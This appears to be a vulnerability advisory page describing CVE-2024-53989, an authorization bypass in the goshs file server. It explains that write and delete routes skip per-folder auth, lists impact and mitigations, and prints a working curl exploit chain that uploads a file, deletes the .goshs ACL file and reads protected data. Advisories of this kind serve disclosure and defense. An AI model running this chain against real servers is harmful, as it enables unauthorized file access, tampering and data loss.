goshs, Authorization Bypass, CVE-2024-53989 (critical)

Listen to this Post

The vulnerability (CVE-2024-53989) exists because goshs enforces per-folder `.goshs` ACL/basic-auth for read operations (directory listings and file serving) but completely skips authorization for state-changing HTTP methods and query parameters. Specifically, the routes for PUT, multipart POST /upload, ?mkdir, and `?delete` are dispatched directly to handler functions that never call the `.goshs` loading or authentication logic. An unauthenticated attacker can upload arbitrary files via `PUT` or multipart form, create new directories with ?mkdir, and delete any file (including the `.goshs` policy file) using `?delete` – all without providing credentials. Because the `?delete` handler uses `os.RemoveAll()` without any ACL check, the attacker can remove the `.goshs` file itself. Once the policy file is gone, the folder reverts to no authentication, allowing the attacker to read previously protected files. The flaw is not path traversal; the paths stay within the configured root. It is an authorization inconsistency: read paths call `findSpecialFile()` and apply custom auth (handler.go:285-305, 545-565, 590-630), while write/delete paths (server.go:94-100, 105-109; handler.go:119-123, 181-187; updown.go:18-60, 63-165; handler.go:679-698, 901-937) do not. Verified on v2.0.0-beta.3 and v1.1.4.
Platform: Go/goshs
Version: v2.0.0-beta.3
Vulnerability : Auth bypass
Severity: Critical
date: 2024-12-10

Prediction: 2025-01-15

What Undercode Say:

Check if target allows unauthenticated PUT
curl -X PUT -d "test" http://target/protected/test.txt
Attempt to delete .goshs ACL
curl "http://target/protected/.goshs?delete"
After deletion, read secret
curl http://target/protected/secret.txt
Enumerate mkdir capability
curl "http://target/protected/newdir?mkdir"

Exploit:

Full exploit chain
TARGET="http://127.0.0.1:18091"
PROTECTED="/protected"
1. Upload malicious file
curl -X PUT --data-binary "injected" "${TARGET}${PROTECTED}/evil.txt"
2. Delete .goshs
curl "${TARGET}${PROTECTED}/.goshs?delete"
3. Access restricted data
curl "${TARGET}${PROTECTED}/secret.txt"

Protection from this CVE

  • Upgrade to patched version (v2.0.0-beta.4 or later) once available.
  • Apply middleware that enforces `.goshs` auth on ALL HTTP methods (PUT, POST, DELETE) and ?mkdir/?delete query parameters.
  • Reject any request that attempts to delete or overwrite `.goshs` file regardless of auth status.
  • Use network-level access control (e.g., firewall, reverse proxy with basic auth) as a temporary workaround.

Impact

  • Confidentiality: Unauthenticated attacker can read all files inside a .goshs-protected folder after deleting the policy file.
  • Integrity: Attacker can upload, overwrite, or delete any file within the protected folder, including creation of malicious content.
  • Availability: Deleting `.goshs` removes the authentication barrier; attacker can also delete legitimate files, causing data loss.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top